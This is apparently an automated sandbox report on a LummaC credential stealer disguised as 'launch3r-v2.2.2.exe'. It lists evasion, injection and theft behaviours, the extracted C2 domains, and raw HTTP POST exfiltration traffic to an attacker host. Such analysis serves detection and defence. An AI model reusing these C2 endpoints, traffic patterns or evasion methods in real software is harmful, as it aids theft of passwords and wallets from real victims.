Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
launch3r-v2.2.2.exe

Overview

General Information

Sample name:launch3r-v2.2.2.exe
Analysis ID:1663604
MD5:2151fa14db38f5b760138ef434cf19db
SHA1:e3d23e54cd659a3c79c70e6adcede8bdf7305745
SHA256:12d1bcd5f34a5bfa63cddf972b8d51213b503b5a940cf3ba10d81104e49e930e
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • launch3r-v2.2.2.exe (PID: 8152 cmdline: "C:\Users\user\Desktop\launch3r-v2.2.2.exe" MD5: 2151FA14DB38F5B760138EF434CF19DB)
    • MSBuild.exe (PID: 7396 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
{"C2 url": ["aquesolp.run/agosoz", "jawdedmirror.run/ewqd", "changeaie.top/geps", "lonfgshadow.live/xawi", "liftally.top/xasj", "nighetwhisper.top/lekd", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "owlflright.digital/qopy"], "Build id": "de1445e12af5d5c2abbd3e3cd7d95674dc60314f35cc20bd9b499627"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.2515196932.0000000003250000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
    00000003.00000002.2512778341.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      Process Memory Space: MSBuild.exe PID: 7396JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        3.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          3.2.MSBuild.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

            System Summary

            barindex
            Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 149.154.167.99, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7396, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49692
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-04-12T01:45:03.451714+020020283713Unknown Traffic192.168.2.549692149.154.167.99443TCP
            2025-04-12T01:45:04.302730+020020283713Unknown Traffic192.168.2.549693104.21.22.10443TCP
            2025-04-12T01:45:06.616538+020020283713Unknown Traffic192.168.2.549694104.21.22.10443TCP
            2025-04-12T01:45:07.638100+020020283713Unknown Traffic192.168.2.549695104.21.22.10443TCP
            2025-04-12T01:45:08.625050+020020283713Unknown Traffic192.168.2.549696104.21.22.10443TCP
            2025-04-12T01:45:10.574781+020020283713Unknown Traffic192.168.2.549697104.21.22.10443TCP
            2025-04-12T01:45:11.696467+020020283713Unknown Traffic192.168.2.549698104.21.22.10443TCP
            2025-04-12T01:45:13.695752+020020283713Unknown Traffic192.168.2.549700104.21.22.10443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://aquesolp.run/agosozAvira URL Cloud: Label: malware
            Source: aquesolp.run/agosozAvira URL Cloud: Label: malware
            Source: 3.2.MSBuild.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["aquesolp.run/agosoz", "jawdedmirror.run/ewqd", "changeaie.top/geps", "lonfgshadow.live/xawi", "liftally.top/xasj", "nighetwhisper.top/lekd", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "owlflright.digital/qopy"], "Build id": "de1445e12af5d5c2abbd3e3cd7d95674dc60314f35cc20bd9b499627"}
            Source: launch3r-v2.2.2.exeVirustotal: Detection: 30%Perma Link
            Source: launch3r-v2.2.2.exeReversingLabs: Detection: 27%
            Source: 3.2.MSBuild.exe.400000.0.raw.unpackString decryptor: aquesolp.run/agosoz
            Source: 3.2.MSBuild.exe.400000.0.raw.unpackString decryptor: jawdedmirror.run/ewqd
            Source: 3.2.MSBuild.exe.400000.0.raw.unpackString decryptor: changeaie.top/geps
            Source: 3.2.MSBuild.exe.400000.0.raw.unpackString decryptor: lonfgshadow.live/xawi
            Source: 3.2.MSBuild.exe.400000.0.raw.unpackString decryptor: liftally.top/xasj
            Source: 3.2.MSBuild.exe.400000.0.raw.unpackString decryptor: nighetwhisper.top/lekd
            Source: 3.2.MSBuild.exe.400000.0.raw.unpackString decryptor: salaccgfa.top/gsooz
            Source: 3.2.MSBuild.exe.400000.0.raw.unpackString decryptor: zestmodp.top/zeda
            Source: 3.2.MSBuild.exe.400000.0.raw.unpackString decryptor: owlflright.digital/qopy
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041F2A3 CryptUnprotectData,3_2_0041F2A3
            Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49692 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.22.10:443 -> 192.168.2.5:49693 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.22.10:443 -> 192.168.2.5:49694 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.22.10:443 -> 192.168.2.5:49695 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.22.10:443 -> 192.168.2.5:49696 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.22.10:443 -> 192.168.2.5:49697 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.22.10:443 -> 192.168.2.5:49698 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.22.10:443 -> 192.168.2.5:49700 version: TLS 1.2
            Source: launch3r-v2.2.2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_0043683A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0043683A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+0000008Ch]3_2_0043683A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax]3_2_0040E8C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-5A85336Ah]3_2_0044D0D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+0000070Dh]3_2_00419899
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov edi, edx3_2_0042F170
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-5Ch]3_2_0042F170
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-05h]3_2_0040D920
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx-30EEE4B2h]3_2_004422C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then add ecx, edi3_2_004422C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then dec ebx3_2_004422C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 7B2BB347h3_2_00418B00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 84511299h3_2_00418B00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h3_2_0044C460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [edi], cx3_2_004495C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+000000D0h]3_2_00410DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_00434F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+00000290h]3_2_00434F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+58812F92h]3_2_00434F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_0040A040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_0040A040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp eax3_2_0042E060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]3_2_0042E060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_0042F8E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000D9h]3_2_0041A8FA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea eax, dword ptr [esp+54h]3_2_0042C0B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]3_2_0044B940
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+4AFCDF4Ch]3_2_0040C970
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [eax+esi]3_2_0040C970
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-5Ch]3_2_00432901
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]3_2_0044D9E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]3_2_0044B9E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [ecx], dx3_2_0042B1E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]3_2_0040B1F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_0043FA40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]3_2_0044BA70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 430C3968h3_2_0044CA70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp word ptr [ecx+edx], 0000h3_2_00422A01
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00422A01
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004492C6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [edi], cx3_2_004492C6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+07FF2506h]3_2_00446B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_00433370
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebp, byte ptr [esp+ecx+6476B28Ah]3_2_0044AB10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], AAD2451Ch3_2_0044AB10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp byte ptr [edx+ecx], al3_2_004023D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-10h], esi3_2_00430382
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [ebp+00h], cx3_2_00427B90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+24h]3_2_0041245E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+34224138h]3_2_0042DC00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [esi+01h]3_2_00401C30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-399FE65Ah]3_2_004224C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-16CF91B6h]3_2_004224C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [edx], cl3_2_00420CB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [ebp+00h], al3_2_00420CB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov edi, eax3_2_00420CB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], A26ABC73h3_2_0044CD70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebp, word ptr [ecx]3_2_0044CD70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then and esi, 80000000h3_2_00423D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-667F0348h]3_2_00435DF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [esp+08h], edx3_2_00435DF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004275B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [ebp+00h]3_2_00401E60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+14h]3_2_0040F670
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [ebp+00h], cx3_2_00422E10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea eax, dword ptr [esp+54h]3_2_0042BEC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]3_2_00443EF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, word ptr [ebp+ecx+00h]3_2_00443EF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], A0E666EBh3_2_00446680
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+54h]3_2_004256B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+12268F24h]3_2_00449EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]3_2_0044B6B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ebx, eax3_2_00408700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-562EAF5Ah]3_2_0042F7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp word ptr [ebx+eax], 0000h3_2_00421FD9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h3_2_00426F80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], ED738D6Fh3_2_00419F84
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea ecx, dword ptr [ebx+ebx]3_2_00431F9C

            Networking

            barindex
            Source: Malware configuration extractorURLs: aquesolp.run/agosoz
            Source: Malware configuration extractorURLs: jawdedmirror.run/ewqd
            Source: Malware configuration extractorURLs: changeaie.top/geps
            Source: Malware configuration extractorURLs: lonfgshadow.live/xawi
            Source: Malware configuration extractorURLs: liftally.top/xasj
            Source: Malware configuration extractorURLs: nighetwhisper.top/lekd
            Source: Malware configuration extractorURLs: salaccgfa.top/gsooz
            Source: Malware configuration extractorURLs: zestmodp.top/zeda
            Source: Malware configuration extractorURLs: owlflright.digital/qopy
            Source: global trafficHTTP traffic detected: GET /asdawfq HTTP/1.1Connection: Keep-AliveHost: t.me
            Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
            Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49692 -> 149.154.167.99:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49697 -> 104.21.22.10:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49695 -> 104.21.22.10:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49694 -> 104.21.22.10:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49693 -> 104.21.22.10:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49696 -> 104.21.22.10:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49698 -> 104.21.22.10:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49700 -> 104.21.22.10:443
            Source: global trafficHTTP traffic detected: POST /agosoz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 65Host: aquesolp.run
            Source: global trafficHTTP traffic detected: POST /agosoz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=jbYhCx732MpGf288User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 14927Host: aquesolp.run
            Source: global trafficHTTP traffic detected: POST /agosoz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Q1Q1WC1rnbUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 15046Host: aquesolp.run
            Source: global trafficHTTP traffic detected: POST /agosoz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O58vUC99jMSG39CvlWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 20575Host: aquesolp.run
            Source: global trafficHTTP traffic detected: POST /agosoz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8rnKhWG0IxQ19AIK3p7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 2599Host: aquesolp.run
            Source: global trafficHTTP traffic detected: POST /agosoz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SSYrK0MK8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 570405Host: aquesolp.run
            Source: global trafficHTTP traffic detected: POST /agosoz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 103Host: aquesolp.run
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /asdawfq HTTP/1.1Connection: Keep-AliveHost: t.me
            Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
            Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
            Source: global trafficDNS traffic detected: DNS query: c.pki.goog
            Source: global trafficDNS traffic detected: DNS query: t.me
            Source: global trafficDNS traffic detected: DNS query: aquesolp.run
            Source: global trafficDNS traffic detected: DNS query: c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com
            Source: unknownHTTP traffic detected: POST /agosoz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 65Host: aquesolp.run
            Source: MSBuild.exe, 00000003.00000002.2513929639.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aquesolp.run/
            Source: MSBuild.exe, 00000003.00000002.2513929639.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aquesolp.run/(
            Source: MSBuild.exe, 00000003.00000002.2513929639.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aquesolp.run/agosoz
            Source: MSBuild.exe, 00000003.00000002.2514321142.0000000000C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aquesolp.run/agosozB
            Source: MSBuild.exe, 00000003.00000002.2514228506.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aquesolp.run/agosozso
            Source: MSBuild.exe, 00000003.00000002.2513929639.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aquesolp.run/p
            Source: MSBuild.exe, 00000003.00000002.2513929639.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aquesolp.run/t:
            Source: MSBuild.exe, 00000003.00000002.2513296452.0000000000B43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aquesolp.run:443/agosozl
            Source: MSBuild.exe, 00000003.00000002.2513180833.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2513045272.00000000007FB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://t.me/asdawfq
            Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49675
            Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
            Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
            Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
            Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
